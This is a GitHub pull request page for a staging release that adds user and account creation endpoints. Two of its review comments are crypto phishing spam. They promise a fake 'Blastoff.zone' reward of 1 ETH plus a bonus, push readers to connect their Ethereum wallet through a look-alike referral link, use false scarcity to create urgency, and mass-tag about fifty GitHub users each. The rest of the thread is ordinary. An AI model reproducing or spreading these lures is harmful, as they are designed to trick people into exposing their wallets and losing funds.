### PR TITLE
major release to staging branch.

### PR DESCRIPTION
**Pull request by Just4Ease**
covers the following:
- create user
- create account ( automatically when user is created )
- endpoints to carry out above actions as well as:
> * get user by id || email || phone
> * get account by id 
> * get account by ownerId

### CODE REVIEW

**Comment by Just4Ease** [comment]
When you see this... CTO, or Engineering lead, please drop a comment :) 🚀

**Comment by taylorcammack** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
byeongjee, @therustmonk, @penso, @shouc, @spartucus, @jiangplus, @Sh0g0-1758, @xxibcill, @zeusAlgo, @echoboss, @xnzac, @robertleifke, @saki-osive, @Folyd, @Oba-One, @blockzeek, @mdtanrikulu, @bitrocks, @Shayansalesi, @malik672, @rameight, @githubsands, @TRkizaki, @lzw65, @cpucorecore, @linearray, @chin0, @intdance, @mike1729, @lunarpulse, @0xfuturistic, @AlicanC, @alexeyxo, @franchb, @danBamikiya, @priom, @cryptoquick, @sayan011, @SamWarden, @bigsky77, @lindamarissa, @adibas03, @serhii-lypko, @thetrung, @NikitaVagin, @horvand, @gmh5225, @chenju2k6, @Clownsw, @victoryang00

**Comment by avijit14** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
jobin212, @ferib, @bejitono, @EthanHess, @redarrowdev, @santoshgistto, @JiriDostalBraiins, @datedatacn, @jordigoyanes, @waynemunro, @CartmanSPC, @celestewinterton, @mrosendin, @rachine2, @satoshishop, @adenhertog, @Henderake, @itsN1X, @sevein, @jige003, @s29papi, @NikonicImagery, @chrisrun, @j42stin, @joosthoeks, @aj07, @BlockHackTk, @xiaoyu2006, @grmkris, @e-corp-sam-sepiol, @code1x1, @Cymatical, @amadeusine, @cbcoin, @aSynch1889, @ziljah, @bram70, @mfcarneiro, @rogeecn, @scDisorder, @nvmr, @thedenisnikulin, @NeilGraham, @frisir, @manakill, @elnegrogato, @ibrucex, @sandriaas, @cvasq, @tsctx

**Comment by ziljah** [comment]
What is This?

**Comment by Just4Ease** [comment]
Hey buddy. Hehe it was for a job. A job interview.

**Pull request merged**
